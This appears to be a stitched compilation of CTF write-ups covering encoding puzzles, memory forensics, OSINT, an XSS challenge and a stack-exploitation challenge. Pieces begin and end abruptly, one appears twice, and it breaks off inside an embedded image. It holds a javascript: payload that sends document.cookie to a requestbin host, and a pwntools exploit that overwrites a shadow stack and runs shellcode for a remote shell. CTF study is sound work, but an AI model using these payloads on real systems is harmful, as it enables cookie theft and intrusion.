archive: buzz--Path = buzzType = Z Everything is Ok Size: 39Compressed: 45```And your flag is in the extracted files:```bashcat buzz~flag{b3a33db7ba04c4c9052ea06d9ff17869}``` ## Pollex We have an image:```? Download the file below.```I was too lazy to switch to my `Kali` VM and run `file` etc. So I just used this [exif tool](http://exif.regex.info/exif.cgi): ![pollex](./pollex.png) ## esab64 Try reconstructing it. `esab64` is kind of like `base64` isn't it?```python3Python 3.7.4 (default, Jul 11 2019, 10:43:21) [GCC 8.3.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> with open('esab64','rt') as file:... todebase = file.readlines()... >>> todebase['mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X']>>> todebase[0][::-1]'X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm'>>> import base64>>> base64.b64decode(todebase[0][::-1])b'_}e61e711106bd0db1b78efa894b1125bf{galf'>>> base64.b64decode(todebase[0][::-1])[::-1]b'flag{fb5211b498afe87b1bd0db601117e16e}_'```There it is :)
# Web Utils (131 Solves/121 Points) ```My friend made this dumb tool; can you try and steal his cookies? If you send me a link, I can pass it along. dumb tool: https://web-utils.dicec.tf/pass it along: https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=web-utils ``` We are again given the source code `app.zip`, which seems to be much larger this time. Looking at the site, we see a "`Link Shortener`" and "`Pastebin`", and as their name suggests, 1 takes a link and "shortens" it, while the other is a pastebin. When we try to insert some kind of `HTML` into the `Pastebin`, we will see that it does not work at all. A quick look at the source code in `public/view.html` reveals why: ```javascriptdocument.title = 'Paste';document.querySelector('div').textContent = data;``` As seen above, the data that we sent is being set into `textContent`, which is **never renders any HTML/JS/CSS**, so this road is probably a dead-end. Looking at the other function: `Link Shorterner`, we see something interesting: ```javascriptif (! data || ! type ) window.location = window.origin;if (type === 'link') return window.location = data;``` It seems like how this works is that it sets data (the link we entered), as `window.location` to redirect the user there. As some might know, there is a way to **run Javascript in a URL** via something like `javascript:alert(1)`. However, there is a cache to this. When we try to submit `javascript:alert(1)`, we will get an "Invalid URL" response. Looking at `api.js` for the `createLink` endpoint, we will see why: ```javascriptconst regex = new RegExp('^https?://'); if (! regex.test(req.body.data)) return rep .code(200) .header('Content-Type', 'application/json; charset=utf-8') .send({ statusCode: 200, error: 'Invalid URL' });``` There is a **Regex which restricts the start** to **strictly** `http://` or `https://` only, and it seems to be flawless. Hence we are unable to put `javascript` as the start. Looking around the source code, we then noticed something was peculiar about the **parameters being called to `addData`**: ```javascriptdatabase.addData({ type: 'link', ...req.body, uid });``` `...` is a **spread operator in Javascript**. It will **replace any key-value pairs that are identical to the key-value pairs in `req.body`** So what that means is that we can do something like: ```javascripttest = {a: 3}test2 = {a: 1, b: 2, c:3, ...test}> {a: 3, b: 2, c: 3}``` and the value of `a` in `test2` is **overwritten** by the value in `test`. Hence, we can make use of the **`createPaste`** endpoint to **skip the regex check**, and then **override `type` to a "link" so that will set the contents to `window.location`**. Hence, we have effectively created a "link" that has bypassed the regex check. We can send the following payload via `POST` to `https://web-utils.dicec.tf/api/createPaste` ```json{"data": "javascript: fetch(`https://requestbin.io/qykha7qy?data=${encodeURIComponent(document.cookie)}`)", "type": "link"}``` and we get the link to send to the `Admin Bot`: ```json{ "statusCode": 200, "data": "mxXqx0q2"}//https://web-utils.dicec.tf/view/mxXqx0q2``` This yields the flag: ```dice{f1r5t_u53ful_j4v45cr1pt_r3d1r3ct}```
Name of challenge suggests it is either base64 or reversed.We are given the string bellow. If we try to decode from base64 it will not work, however if we reverse the string:Reverse this:mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X Into this:X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm Decode from base64_}e61e711106bd0db1b78efa894b1125bf{galf reverse again and get the flag flag{fb5211b498afe87b1bd0db601117e16e}
# [zer0pts CTF 2021](https://2021.ctf.zer0pts.com) - "Not Beginner's Stack" ## Challenge ### Description Elementary pwners love to overwrite the return address. This time you can't! \`nc pwn.ctf.zer0pts.com 9011` ### Files ```not_beginners_stack_0956db1b183fd1e9877f64c713871f3b.tar.gz/ not_beginners_stack/ chall FOR_BEGINNERS.md main.S``` ## Analysis The tarball contains a file `FOR_BEGINNERS.md` explaining the stack, how stack buffer overflows are normally used to overwrite the return pointer and why it won't work in this challenge since `call`/`ret` are replaced with `jmp`s reading return pointers from a "shadow stack" stored in the `.bss` section. It also provides a hint on what can be done instead, i.e. overwriting the base pointer. We are given the assembly code `main.S` of the challenge binary, so there is not much reverse engineering required to craft an exploit. I use `objdump -d -M intel chall` to find the raw addresses and generated labels I need. `checksec` on `chall`:```[*] "/home/luca/projects/zer0pts CTF/pwn/Not Beginner's Stack/not_beginners_stack/chall" Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments```This should be easy.[1] The output of `checksec` is especially important for this challenge as it correctly reports the stack to be executable *in theory*, which it is not on my local machine or, apparently, on modern kernels in general.[2] This means that we cannot get the shellcode part of my exploit to work locally, but at least it works on the remote. > It works on their machine. — Then we'll ship their machine. With the return addresses on a shadow stack, we need to find a way to write there. Since `rbp` is still saved to the "regular" stack, we can overwrite it with a pointer into the data segment (the address of which is known because of `No PIE`) using the vulnerable `read` in `vuln` (reading up to 4096 bytes into a 256-byte stack buffer). Then, the `leave` instruction at the end of `vuln` sets `rsp` to the current base pointer and pops `rbp` off the stack, thus setting it to our desired value. The subsequent `read` in `notvuln` now writes a shiny new shadow stack to `[rbp-0x100]`. ## Exploit My exploit requires the current `stable` version of `pwntools` (`4.3.1` at the time of writing). ```python#!/usr/bin/env python3 from pwn import * BINARY = 'not_beginners_stack/chall'``` I implemented my own little helper class for building the shadow stack, similar to `pwntools`' `ROP`. ```pythonclass ShadowStack: def __init__(self, binary): self.binary = binary self.depth = 0 self.stack = b'' self.meta = [] def __getattr__(self, sym): addr = self.binary.symbols[sym] def call(*args): if args: raise NotImplementedError self.call(addr, sym) return call def call(self, addr, meta=None): self.depth += 1 self.stack = p64(addr) + self.stack self.meta.append(meta) def chain(self, length=None): return flat({0x0: p32(self.depth), 0x6: self.stack}, length=length) def dump(self): stack = self.stack dump = [f'__stack_depth: {self.depth}', '__stack_shadow:'] for i, m in enumerate(self.meta): addr = int.from_bytes(stack[-8:], context.endian) stack = stack[:-8] dump.append(f' [{len(self.meta)-i-1}] {hex(addr)} ' + (m or '<raw>')) return '\n'.join(dump)``` The first part of the exploit builds a new shadow stack used to overwrite the current one as described above:1. `notvuln()` — `enter`s twice, but `leave`s only once; the second `enter` pushes an address to the regular stack onto it2. `vuln()` — `enter`s the second stack frame from the previous call again, `rdi`, `rsi` and `rdx` will be set to `0`, `[rbp-0x100]` and `0x1000`, respectively3. `0x400115()`[3] — set `rdi` to `1`, then call `write`, then `read`; this leaks 4096 bytes of stack memory and reads some shellcode onto the stack; the aforementioned stack address is at offset `0x100` in the leak5. `[email protected]_address()` — `leave` to set `rbp` to `[__stack_shadow+0x100]`6. `[email protected]_address()` — read another shadow stack7. `exit()` — not used in the final exploit, cleanly exit when testing e.g. the leak ```pythoncontext(binary=BINARY)elf = context.binary shadow = ShadowStack(elf)shadow.notvuln()shadow.vuln()#shadow.call(0x40018a)shadow.call(0x400115)getattr(shadow, '[email protected]_address')()getattr(shadow, '[email protected]_address')()shadow.exit()print(shadow.dump())``` Send/receive data as described above or required for `read` to continue: ```pythonshellcode = asm(shellcraft.sh()) #conn = process(BINARY)conn = remote('pwn.ctf.zer0pts.com', 9011) #gdb.attach(conn) # regular i/oconn.sendafter(b'Data: ', flat({0x100: elf.symbols['__stack_depth']+0x100})) # overwrite rbpconn.sendafter(b'Data: ', shadow.chain(0x100)) # overwrite shadow stack # shadow.notvuln()conn.sendafter(b'Data: ', b'A')conn.sendafter(b'Data: ', b'A') # shadow.vuln()conn.sendafter(b'Data: ', b'A') leak = conn.recvn(0x1000)#print(hexdump(leak)) # shadow.call(0x40018a)#conn.send(flat({0x0: shellcode, 0x100: elf.symbols['__stack_depth']+0x100}, length=0x1000)) # shadow.call(0x400115)conn.send(flat(shellcode, length=0x100))``` The second part of the exploit consists of extracting the leaked stack address and building another shadow stack to jump to the shellcode at `stack_addr-0x100`: ```pythonstack_addr = int.from_bytes(leak[0x100:0x108], context.endian)print('Leaked address:', hex(stack_addr)) # getattr(shadow, '[email protected]_address')()shadow = ShadowStack(elf)shadow.call(stack_addr-0x100)conn.send(shadow.chain(0x100))#conn.send(p32(1)) conn.interactive()``` (For testing the leak, we can send `1` instead of the shadow stack. The process then returns to `exit` instead of the shellcode to terminate itself after the leak.) This will give us a shell from which we can run `cat flag-*.txt`. Yay! ```zer0pts{1nt3rm3d14t3_pwn3r5_l1k3_2_0v3rwr1t3_s4v3d_RBP}``` Sometimes the script will hang when reading the leak. `Ctrl-C` and running it again works for me. ## Footnotes 1. It still took me way too long to get to a working exploit or even the leak.2. It could have been even easier: As it turns out, not only is the stack executable, but the data segment as well.3. I originally intended to use `0x40018a` here since it would ensure that the following `leave` (which would also be included, rendering `[email protected]_address` unnecessary) loads `[__stack_shadow+0x100]` into `rbp` by writing that address to the stack again. However, the value is already there and I did not want to print another prompt or otherwise separate the final two unconditional `send`s, so I chose to use `0x400115` and write as much bytes as would be consumed. Writing as much bytes as `read` would consume at `0x40018a` did not work — overflowing the buffer with 4096 bytes lead to a segmentation fault.
# Typewriter**Category: Forensics** 448 Points > A CONSTELLATIONS employee had his machine crash and he lost all his work. Thankfully IT managed to get a memory dump. Can you recover his work? > Download the file below. Note, this is a large ~400MB file and may take some time to download. The challenge includes a download which extracts to a 2GB memory dump named `image.bin`. ## Exploring the MemoryThe first thing we need to do is to work out what operating system created this dump. We can do this with `volatility`. ```$ volatility -f image.bin imageinfo Volatility Foundation Volatility Framework 2.6INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86 AS Layer1 : IA32PagedMemoryPae (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/c/Users/meraxes/dev/ctf/2021/nahamcon/forensics/typewriter/image.bin) PAE type : PAE DTB : 0x185000L KDBG : 0x8293bde8L Number of Processors : 1 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0x80b97000L KUSER_SHARED_DATA : 0xffdf0000L Image date and time : 2021-02-21 16:25:49 UTC+0000 Image local date and time : 2021-02-21 08:25:49 -0800``` Looks like we are dealing with `Win7SP1x86_23418`. We will use this in our following volatility commands. Next, let's take a look at what processes are running: ```volatility -f image.bin --profile=Win7SP1x86_23418 pslistVolatility Foundation Volatility Framework 2.6Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------0x84841938 System 4 0 72 500 ------ 0 2021-02-22 01:24:16 UTC+0000... <spliced>0x8623e030 explorer.exe 2212 2192 29 628 1 0 2021-02-21 16:24:28 UTC+00000x85f56a68 VBoxTray.exe 2312 2212 13 159 1 0 2021-02-21 16:24:29 UTC+00000x85f3bd20 StikyNot.exe 2320 2212 9 144 1 0 2021-02-21 16:24:29 UTC+00000x85f523d8 SearchIndexer. 2468 436 12 596 0 0 2021-02-21 16:24:29 UTC+00000x85fa2d20 WINWORD.EXE 2760 2212 8 316 1 0 2021-02-21 16:24:39 UTC+00000x85f687d8 OSPPSVC.EXE 2828 436 5 143 0 0 2021-02-21 16:24:40 UTC+0000``` `WINWORD.EXE` (PID=2760) jumped out at me as being potentially interesting. We can see the arguments the program was started with by using the `cmdline` option, and supplying the process ID. ```$ volatility -f image.bin --profile=Win7SP1x86_23418 cmdline -p 2760 Volatility Foundation Volatility Framework 2.6************************************************************************WINWORD.EXE pid: 2760Command line : "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\IEUser\Desktop\CONFIDENTIAL DOCUMENT.docx``` Well, that certainly is interesting! We can look for more information about this file, and try to extract it from the dump. The next step is to figure out the offsets of the files in the dump: ```$ volatility -f image.bin --profile=Win7SP1x86_23418 filescan > files.txt``` Searching for the file in the `files.txt` output, I can find: ```Offset(P) #Ptr #Hnd Access Name------------------ ------ ------ ------ ----...0x000000007e841f80 8 0 RW-r-- \Device\HarddiskVolume1\Users\IEUser\Desktop\CONFIDENTIAL DOCUMENT.docx``` Let's dump the file at that offset. This gives us the data section object (`file.None.0x85e41580.CONFIDENTIAL DOCUMENT.docx.dat`) and shared cache map (`file.None.0x85e41b30.CONFIDENTIAL DOCUMENT.docx.vacb`):```$ volatility -f image.bin --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007e841f80 -n -u --dump-dir=filesVolatility Foundation Volatility Framework 2.6DataSectionObject 0x7e841f80 None \Device\HarddiskVolume1\Users\IEUser\Desktop\CONFIDENTIAL DOCUMENT.docxSharedCacheMap 0x7e841f80 None \Device\HarddiskVolume1\Users\IEUser\Desktop\CONFIDENTIAL DOCUMENT.docx``` ## Examining the Document I don't have Microsoft Word installed on my computer. Instead of trying to open this, I opted to manually inspect it. Word files are internally a zip of xml files. We can unzip the file to see what is inside: ```$ unzip file.None.0x85e41580.CONFIDENTIAL\ DOCUMENT.docx.dat Archive: file.None.0x85e41580.CONFIDENTIAL DOCUMENT.docx.dat inflating: [Content_Types].xml inflating: _rels/.rels inflating: word/_rels/document.xml.rels inflating: word/document.xml inflating: word/theme/theme1.xml inflating: word/settings.xml inflating: word/webSettings.xml inflating: word/stylesWithEffects.xml inflating: docProps/core.xml inflating: word/styles.xml inflating: word/fontTable.xml inflating: docProps/app.xml``` `document.xml` is what we want. After running it through an xml format beautifier we can see: ```xml <w:t>CONFIDENTIAL DOCUMENT</w:t> </w:r> </w:p> <w:p w:rsidR="001342CC" w:rsidRDefault="001342CC" w:rsidP="001342CC"> <w:r> <w:t>This document contains some critical information for Constellations</w:t> </w:r> </w:p> <w:p w:rsidR="001342CC" w:rsidRDefault="001342CC" w:rsidP="001342CC"> <w:proofErr w:type="gramStart" /> <w:r w:rsidRPr="001342CC"> <w:t>f</w:t> </w:r> <w:proofErr w:type="gramEnd" /> </w:p> <w:p w:rsidR="001342CC" w:rsidRDefault="001342CC" w:rsidP="001342CC"> <w:proofErr w:type="gramStart" /> <w:r w:rsidRPr="001342CC"> <w:t>l</w:t> </w:r> <w:proofErr w:type="gramEnd" /> </w:p> <w:p w:rsidR="001342CC" w:rsidRDefault="001342CC" w:rsidP="001342CC"> <w:proofErr w:type="gramStart" /> <w:r w:rsidRPr="001342CC"> <w:t>a</w:t> </w:r> <w:proofErr w:type="gramEnd" /> </w:p> <w:p w:rsidR="001342CC" w:rsidRDefault="001342CC" w:rsidP="001342CC"> <w:proofErr w:type="gramStart" /> <w:r w:rsidRPr="001342CC"> <w:t>g</w:t> </w:r> <w:proofErr w:type="gramEnd" /> </w:p> ...``` The flag is here, spelled out one character at a time in the xml blocks. We could type this out one character at a time, or make a parser to do that for us: ```sh$ cat pretty-document.xml | grep \<w:t\>.\</w:t\> | sed 's/.*<w:t>\(.\).*/\1/' | tr --delete '\n' flag{c442f9ee67c7ab471bb5643a9346cf5e}```
# Gus Rodry — Accounting ```mdThis is Stage 1 of Path 4 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Use open-source intelligence to track down information on Gus. With the flag of this challenge, you should also find details you can use in later challenges.``` When having a look at the [Constellations GitHub](https://github.com/constellations-git) during my early recon stage, I already found [Gus and _his_ GitHub repo](https://github.com/gusrodry). We can see a commit message `Update flag.txt` and that gives us a text-file inside `development/config/.ssh/flag.txt`: ```# NOTE:# This flag submits for the `Gus` challenge you should see after solving `Meet The Team`, after you solve `Bionic` flag{84d5cc7e162895fa0a5834f1efdd0b32}``` _Gus also had some ssh keys checked in. Those came in handy when trying the next challenge `banking on it`. However I was not able to complete that one_
Below I first include my walkthrough for version 1, and then version 2 that builds on this. [Skip to version 2](#version-2-solution). ## Version 1 Solution If we go to the app's URL we are presented with a login page ![](data:image/png;base64,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